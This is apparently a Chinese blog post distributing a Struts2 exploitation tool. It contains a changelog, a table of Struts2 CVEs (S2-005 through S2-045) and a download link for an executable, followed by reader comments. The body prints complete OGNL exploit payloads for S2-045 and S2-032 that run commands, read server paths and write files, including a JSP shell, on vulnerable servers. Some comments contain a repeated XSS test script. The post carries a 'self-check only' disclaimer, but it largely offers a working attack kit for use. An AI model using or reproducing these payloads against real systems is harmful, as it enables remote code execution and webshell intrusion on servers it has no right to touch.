我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>博主出品>>Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)
Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)
84228 阅
6 推荐
38 评论

    Struts2漏洞利用工具下载(已更新V1.8版)

    

2017-03-21:
增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html、


2017-03-07:

增加安恒信息研究员nike.zheng发现的S2-045,jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。http://struts.apache.org/docs/s2-045.html


相关exp:

S2-045:

1.验证漏洞,修改Content-Type,返回内容为“webpath”代表存在漏洞。

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}

2.执行命令

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}


3.上传文件:

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}




S2-032 20160426  漏洞参考 http://seclab.dbappsecurity.com.cn/?p=924

获取磁盘目录:
1. 
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8


执行命令:
1.
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=A&ppp=%20&encoding=UTF-8

2.
method:%23_memberAccess[%23parameters.name1[0]]%3dtrue,%23_memberAccess[%23parameters.name[0]]%3dtrue,%23_memberAccess[%23parameters.name2[0]]%3d{},%23_memberAccess[%23parameters.name3[0]]%3d{},%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew%20java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&name=allowStaticMethodAccess&name1=allowPrivateAccess&name2=excludedPackageNamePatterns&name3=excludedClasses&cmd=whoami&pp=A&ppp=%20&encoding=UTF-8

上传文件:
1.
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=stest.jsp&shellContent=tttt&encoding=UTF-8&pp=%2f


更新日志:

2017-03-21:
增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html


2017-03-07:
增加安恒信息研究员nike.zheng发现的S2-045,jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。http://struts.apache.org/docs/s2-045.html
2016-04-26:
增加最新的S2-032远程代码执行漏洞,和S2-019很相似。
参考:http://seclab.dbappsecurity.com.cn/?p=924
2015-12-01:
采用scanner读数据流,再也不用担心s16不能执行net user/ipconfig/netstat -an等命令了。
增加复杂数据包(multipart/form-data)提交方式进行漏洞利用,可绕过部分防护。可执行命令,暂时无法上传文件。
2014-11-12:
最近遇到s19这个debug模式开启导致代码执行,这个有点少,但还是有一些,为了方便大家把13版本修改了一下。可以利用这个漏洞执行命令、上传shell。
警告:
本工具为漏洞自查工具,请勿非法攻击他人网站!
==漏洞编号==============影响版本=========================官方公告==========================================影响范围=====
S2-045 CVE-2017-5638 Struts 2.3.5-2.3.31, Struts 2.5-2.5.10 http://struts.apache.org/docs/s2-045.html 影响范围较大
S2-037 CVE-2016-4438 Struts 2.3.20-2.3.28.1 http://struts.apache.org/docs/s2-037.html 影响范围小
S2-032 CVE-2016-3081 Struts 2.3.18-2.3.28 http://struts.apache.org/release/2.3.x/docs/s2-032.html 影响范围小
S2-020 CVE-2014-0094 Struts 2.0.0-2.3.16 http://struts.apache.org/release/2.3.x/docs/s2-020.html 影响范围小
S2-019 CVE-2013-4316 Struts 2.0.0-2.3.15.1 http://struts.apache.org/release/2.3.x/docs/s2-019.html 影响范围一般
S2-016 CVE-2013-2251 Struts 2.0.0-2.3.15 http://struts.apache.org/release/2.3.x/docs/s2-016.html 影响范围非常大
S2-013 CVE-2013-1966 Struts 2.0.0-2.3.14 http://struts.apache.org/release/2.3.x/docs/s2-013.html 未添加,S2-016范围内
S2-009 CVE-2011-3923 Struts 2.0.0-2.3.1.1 http://struts.apache.org/release/2.3.x/docs/s2-009.html 未添加,S2-016范围内
S2-005 CVE-2010-1870 Struts 2.0.0-2.1.8.1 http://struts.apache.org/release/2.2.x/docs/s2-005.html 未添加,S2-016范围内



仅提供验证漏洞使用,请勿非法使用,产生的任何法律问题,一概与本人无关。

1.png

下载地址:

Struts2漏洞利用工具2017版.rar


文件名称: Struts2漏洞利用工具2017版.exe
文件大小: 104 KB (107008 字节)
文件版本: 1.8.0.0
修改时间: 2017年03月22日,17:39:29
MD5: 3B405C30A7028E05742D0FBF0961E6B2
SHA1: 1D69338543544B31444D0173C08E706D57F148CB
CRC32: 97AC167B
计算时间: 0.00s


已经有 ( 38 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
  • 38楼 发表于:2017-09-06 11:15:46        回复
    052出来了
  • 37楼 发表于:2017-08-11 09:20:01        回复
    048是鸡肋不更新。
  • 36楼 发表于:2017-08-10 16:17:16        回复
    哥,048出来了,能更新一版吗
  • 35楼 发表于:2017-07-12 14:10:08        回复
    048出来了 跟新了没呢
  • 34楼 发表于:2017-04-21 14:39:21        回复
    怎么弄啊 不太会呀
  • 33楼 发表于:2017-04-06 12:34:58        回复
    验证速度真是超级慢啊 - -
  • 32楼 发表于:2017-04-01 10:15:38        回复
    我发现最新的工具对https的检测不出来
  • 31楼 发表于:2017-03-13 16:30:04        回复
    最新的S2-045已经更新,不过要等一段时间才放出来。敬请关注。
  • 30楼 发表于:2017-03-13 16:00:22        回复
    大神最新的还出么- -貌似只有大神这个能带COOKIE的
  • 29楼 发表于:2016-07-19 10:50:49        回复
    没办法打开
  • 28楼 发表于:2016-06-16 23:07:26        回复
    导入一次扫描后,再导入扫描不是把上次清空再扫描。这点很不方便。软件现在还没有加入 s2-037 吗
  • 27楼 发表于:2016-05-23 17:40:04        回复
    windows系统可以验证码
  • 26楼 发表于:2016-05-09 17:50:44        回复
    扫了 导出不了~!
  • 25楼 发表于:2016-05-04 14:28:34        回复
    我是小白,测试了下可用,基本检测到网上的都是016的漏洞,哈哈,我大概 扫的不对,然后扫完后不能导出有点麻烦,也不能复制
  • 24楼 发表于:2016-04-28 15:14:53        回复
    怎么验证029的漏洞啊,可以发一些这两个漏洞的资料吗
  • 23楼 发表于:2016-04-28 06:02:23        回复
    Struts2 漏洞全套检测工具能否给我一份,谢谢992900701@qq.com
  • 22楼 发表于:2016-04-27 08:38:47        回复
    批量执行cmd.txt命令无法使用,单个执行可以
  • 21楼 发表于:2016-04-26 22:01:54        回复
    LZ你好,Struts2 S2-029检查工具可否发我一份,多谢了~ 531476399@qq.com
  • 20楼 发表于:2016-01-05 15:25:52        回复
  • 19楼 发表于:2015-12-27 10:10:45        回复
    膜拜大牛
  • 18楼 发表于:2015-12-07 19:18:17        回复
    楼主能给份源码学习一下吗
  • 17楼 发表于:2015-11-29 05:36:38        回复
    <script>alert("dd")</script>
  • 16楼 发表于:2015-10-25 23:51:50        回复
    <script>alert("dd")</script>
  • 15楼 发表于:2015-06-20 02:08:26        回复
    <script>alert("dd")</script>
  • 14楼 发表于:2015-03-11 13:23:10        回复
    成功20条,显示出来的,才4条!
  • 13楼 发表于:2015-01-26 11:08:08        回复
    安装.net framework
  • 12楼 发表于:2015-01-26 09:41:08        回复
    我想问问 软件打不开是神马原因啊?
  • 11楼 发表于:2014-03-24 00:48:53        回复
    可以搞个教程吗我不会使用....感谢楼主发到我邮箱1045158267@qq.com
  • 10楼 发表于:2014-03-16 14:33:59        回复
    楼主好人 一生平安:D
  • 9楼 发表于:2014-01-06 12:02:05        回复
    test
  • 8楼 发表于:2013-09-08 22:00:08        回复
    楼主邮箱一份 机油www.hackxue.com
  • 7楼 发表于:2013-09-08 21:58:06        回复
    能邮箱吗?1.2的表示下载不了机油 博客链接www.hackxue.com
  • 6楼 发表于:2013-08-19 10:29:35        回复
    工具能否发我一份 谢谢了
  • 5楼 发表于:2013-08-08 21:43:15        回复
    有什么疑问,软件问题,可以在这里留言,我会来解决,我自己没怎么用,也没怎么测试,有些东西,大家用了才知道,有哪些问题
  • 4楼 发表于:2013-08-08 18:17:27        回复
    每次都要自己一点一点的删除扫出来的数据。 好在开源的。就自己加了个 清空数据 的选项。 然后自定义上传地址。。每次都是默认的。本来上传成功了。搞的我以为没有上传到我自定义的目录。。。。 还有。。ls出的文件内容要是分行显示就好了。 想自己搞的。因为以前是写PHP的。C#还是不太懂。没搞定。。。
  • 3楼 发表于:2013-07-31 17:23:35        回复
    楼主发给我一份,谢谢
  • 2楼 发表于:2013-07-26 20:48:10        回复
    提供两种上传,默认都是上传到当前web根目录,自定义上传,自己写磁盘目录
  • 1楼 发表于:2013-07-26 19:09:13        回复
    白高兴了一场,自定义路径改都没改,还是不能用。 #p=(#req.getRealPath("/")+"test.jsp") 这个req.getRealPath还是当前目录。
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415